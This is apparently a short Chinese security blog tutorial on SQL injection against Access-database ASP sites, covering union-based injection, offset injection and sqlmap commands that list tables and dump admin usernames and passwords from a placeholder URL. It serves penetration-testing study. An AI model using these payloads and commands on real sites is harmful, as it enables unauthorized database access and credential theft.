若盛世将倾,深渊在侧,我辈当万死以赴
访问漏洞url:
1.Access联合查询
判断是否有注入
and 1=1正常,and 1=2出错
判断字段数
order by 7正常
order by 8出错
爆破出表名并判断回显点为2,5
查看字段内容,将字段名填入回显点1
MD5解密
2.Access偏移注入
按上面的步骤判断出表名和字段数之后开始使用偏移注入
偏移量就是逐步增加或递减,直到出现结果。*表示可代替的字符串,用*代替7,返回界面依旧报错,然后用*代替6,依次递减。7-2=5,5表示admin_user表中的列名个数。
7-3=4,4表示admin_user_count表中的列名个数。
3.sqlmap工具注入
sqlmap.py -u http://x/index.asp?id=31 --tables --batch
注入信息检测
注入出表名
sqlmap.py -u http://x/index.asp?id=31 -T x --columns --batch
注入出字段名
sqlmap.py -u http://x/index.asp?id=31 -T x -C "admin,password" --dump --batch
注入出字段的内容
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。
转载声明:各家兴 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。
CSDN:
https://blog.csdn.net/weixin_48899364?type=blog
公众号:
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect
博客:
https://rdyx0.github.io/
先知社区:
https://xz.aliyun.com/u/37846
SecIN:
https://www.sec-in.com/author/3097
FreeBuf:
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85